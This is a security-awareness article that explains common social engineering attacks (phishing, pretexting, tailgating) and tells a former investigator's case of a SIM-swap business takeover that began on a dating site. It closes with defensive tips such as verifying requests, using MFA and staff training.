According to the Cyber Security Breaches Survey 2023, phishing (a form of social engineering) is by far the most common type of cyber attack.  A staggering 79% of businesses and 83% of charities reported being targeted by phishing attacks in the last 12 months. In fact, the problem is so widespread that the average organisation is targeted by over 700 social engineering attacks each year. And some 98% of cyberattacks involve a form of social engineering.

Nor is the problem confined to the well-heeled. Social engineering attacks are 350% more common for employees of small businesses than at larger enterprises.

What are the most common types of Social Engineering?

As discussed previously, there are many types of social engineering. This includes phishing, pretexting, tailgating, baiting, watering hole attacks and many more. Understanding the many forms of social engineering will help you defend against them.

Phishing

The most widely recognised form of social engineering is Phishing. Phishing is most commonly launched via email but can be conducted through SMS (Smishing) or a phone call (Vishing). 

A phishing email will present itself in your inbox and on the surface appear to be a genuine email. However, the email will be from an attacker and may contain malicious attachments or links. These could be used to take some form of control over your computer or to redirect you to a spoof website in which you input your credentials, allowing the attacker to steal them.

Pretexting

Pretexting is another commonly used social engineering technique. In this attack, the social engineer will use a fictional scenario to justify why they are contacting you. Once contact has been made, the social engineer will try to obtain information from you.

For example, the attacker could pose as the IT help desk, calling you to help with a reported issue with your computer, gaining your trust and offering to connect to your computer to quickly resolve the problem remotely. If successful, the attacker could then exploit this access to your computer.

Tailgating

Tailgating is slightly different. These attacks are aimed at physical, rather than digital, entry into your business. Usually,  the social engineer would follow you as you opened and walked through a secure entry, thus allowing them access too.

This scenario is one that we have all faced. You use your keycard to open the office door, as you walk through someone runs up behind you and you feel obliged to hold the door for them. It may be that you see someone approaching the door carrying a heavy box. Although this sounds like something we would never do, our emotions and initial reaction to want to help people who are in a situation that we have all been in prompts us to take action and hold that door open.

Social engineering in the real world: a dating disaster 

Having worked in law enforcement for 15 years, I have investigated hundreds of crimes. 

One case I investigated was the takeover of a business and subsequent fraudulent transactions over 48 hours. This all started with social engineering. 

In this case, a business owner had signed up for a dating website. The business owner began chatting to someone via instant messages on the site, there was nothing unusual about this. The conversation was going well and the pair discussed their likes and dislikes. The conversation moved to star signs and the victim revealed their date and place of birth. Again, this was all within the context of the conversation and appeared quite normal. However, things were not as they seemed.

Romance turns to horror 

Unbeknownst to the victim, the social engineer had struck gold. A quick Google search of the victim’s name revealed his business website, including his mobile phone number.

This information was used to contact his mobile phone provider and port his mobile number to the social engineer’s sim card. The victim’s phone was no longer receiving text messages or calls, as they were being sent to a phone that the social engineer controlled.

But it didn’t stop there, using the victim’s personal details and phone number the social engineer proceeded to take control of the business’s website and email address, ultimately taking out a loan in the business owner’s name. Within 48 hours the victim had lost control of his business and owed the bank thousands of pounds. He only realised something was up when he couldn’t use his phone.

Fortunately, he was able to recover his phone number and some of the money was recovered. However, this took weeks to rectify and the time, stress and effort he put into getting back to square one is not to be overlooked.

How to recognise social engineering attacks

We are all very busy, the digital world is always available to us, whether we are sitting at our desks or in the back of a taxi using our phones. The next meeting or deadline is always within touching distance. Because of this, we may not always have our full attention focused on how we respond to the many interactions we have within our day.

Here are three strategies to be used to help recognise social engineering attacks:

1. Trust Your Instincts

If something feels off or too good to be true, it probably is. Trust your gut feelings when you encounter suspicious requests or situations. 

2. Be wary of your emotions

Social engineers want to trigger an emotional response to encourage you to make a quick decision. Take a step back and consider whether the situation truly requires immediate action.

3. Verify unusual requests

If you receive unusual requests, such as transferring money, providing access to a building, or sharing sensitive data, independently verify the request through a trusted and known communication channel.

How to protect yourself

The threat will always be there and, as we have seen, it can take many forms. Here are three simple measures that can we put in place both at work and in our personal lives to help counteract the threat.

Use MFA

Whenever possible, enable multi-factor authentication (MFA) on your accounts. Even if an attacker obtains your password, they won’t be able to access your accounts without the second factor.

Don’t share too much on social media

Be cautious about sharing personal information on social media platforms. As we saw in the case study, attackers will use information gleaned to craft convincing social engineering attacks.

Education and training

Regular security awareness training for everyone is vital. Proofpoint found that only 56% of organisations with a security awareness program train their entire workforce. We lock all our doors and windows at night, and we should train everybody to ensure common social engineering tactics are recognised and stopped before they can harm us.

Looking to protect your business on a budget without sacrificing security? Read our guide to find out how.